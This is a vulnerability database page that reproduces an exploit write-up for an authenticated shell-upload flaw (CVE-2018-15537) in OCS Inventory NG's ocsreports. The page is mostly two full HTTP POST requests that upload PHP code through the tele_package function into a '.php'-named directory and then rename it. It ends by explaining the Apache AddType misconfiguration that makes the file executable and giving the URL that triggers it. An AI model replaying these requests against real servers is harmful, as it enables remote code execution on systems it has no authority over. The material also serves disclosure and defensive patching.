Vulners
Lucene search
OCS Inventory NG ocsreports Shell Upload Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2018-15537 | 14 Nov 201815:59 | – | circl |
 | CVE-2018-15537 | 29 Nov 201821:00 | – | cve |
 | CVE-2018-15537 | 29 Nov 201821:00 | – | cvelist |
 | CVE-2018-15537 | 29 Nov 201821:00 | – | debiancve |
 | EUVD-2018-7413 | 7 Oct 202500:30 | – | euvd |
 | CVE-2018-15537 | 29 Nov 201821:29 | – | nvd |
 | OCS Inventory NG <= 2.5.0 Remote Shell Upload Vulnerability | 23 Nov 201800:00 | – | openvas |
 | DEBIAN-CVE-2018-15537 | 29 Nov 201821:29 | – | osv |
| UBUNTU-CVE-2018-15537 | 29 Nov 201821:29 | – | osv |
 | OCS Inventory NG ocsreports Shell Upload | 14 Nov 201800:00 | – | packetstorm |
10
OCS Inventory NG ocsreports Shell Upload
## Request 1
This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------491299511942
Content-Length: 2836
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------491299511942
Content-Disposition: form-data; name="CSRF_10"
8ab3df2f9a2078530027e74191af0b087429ad41
-----------------------------491299511942
Content-Disposition: form-data; name="document_root"
/usr/share/ocsinventory-reports/ocsreports/
-----------------------------491299511942
Content-Disposition: form-data; name="timestamp"
a.php.a
-----------------------------491299511942
Content-Disposition: form-data; name="NAME"
dshasdgasga
-----------------------------491299511942
Content-Disposition: form-data; name="DESCRIPTION"
asdgasdga
-----------------------------491299511942
Content-Disposition: form-data; name="OS"
WINDOWS
-----------------------------491299511942
Content-Disposition: form-data; name="PROTOCOLE"
HTTP
-----------------------------491299511942
Content-Disposition: form-data; name="PRIORITY"
5
-----------------------------491299511942
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
Content-Type: application/x-zip-compressed
<?php
phpinfo();
?>
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION"
EXECUTE
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION_INPUT"
asdgasdgasdg
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_USE"
0
-----------------------------491299511942
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
d:\tele_ocs
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
5
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_USER"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_TEXT"
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
-----------------------------491299511942
Content-Disposition: form-data; name="valid"
Send
-----------------------------491299511942
Content-Disposition: form-data; name="digest_algo"
MD5
-----------------------------491299511942
Content-Disposition: form-data; name="digest_encod"
Hexa
-----------------------------491299511942
Content-Disposition: form-data; name="download_rep_creat"
/var/www/html/download/server/
-----------------------------491299511942--
## Request 2
This request renames the file to a.php.a-1 and also creates info file.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 3345
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------4827543632391
Content-Disposition: form-data; name="CSRF_13"
53b6eab749060aa8cbe972e9c9a31ae148cf886b
-----------------------------4827543632391
Content-Disposition: form-data; name="tailleFrag"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="nbfrags"
1
-----------------------------4827543632391
Content-Disposition: form-data; name="comment"
asdgasdga
-----------------------------4827543632391
Content-Disposition: form-data; name="digest"
b14f8d3b56fb10f2257f53ab32947a50
-----------------------------4827543632391
Content-Disposition: form-data; name="VALID_END"
END
-----------------------------4827543632391
Content-Disposition: form-data; name="SIZE"
347
-----------------------------4827543632391
Content-Disposition: form-data; name="document_root"
/usr/share/ocsinventory-reports/ocsreports/
-----------------------------4827543632391
Content-Disposition: form-data; name="timestamp"
a.php.a
-----------------------------4827543632391
Content-Disposition: form-data; name="NAME"
dshasdgasga
-----------------------------4827543632391
Content-Disposition: form-data; name="DESCRIPTION"
-----------------------------4827543632391
Content-Disposition: form-data; name="OS"
WINDOWS
-----------------------------4827543632391
Content-Disposition: form-data; name="PROTOCOLE"
HTTP
-----------------------------4827543632391
Content-Disposition: form-data; name="PRIORITY"
5
-----------------------------4827543632391
Content-Disposition: form-data; name="teledeploy_file"; filename=""
Content-Type: application/octet-stream
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION"
EXECUTE
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION_INPUT"
asdgasdgasdg
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_USE"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
d:\tele_ocs
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
5
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_USER"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_TEXT"
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_algo"
MD5
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_encod"
Hexa
-----------------------------4827543632391
Content-Disposition: form-data; name="download_rep_creat"
/var/www/html/download/server/
-----------------------------4827543632391--
# Apache Config
The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:
AddType application/x-httpd-php .php
Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext
Regards,
Simon Uvarov
# 0day.today [2018-11-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Nov 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.0229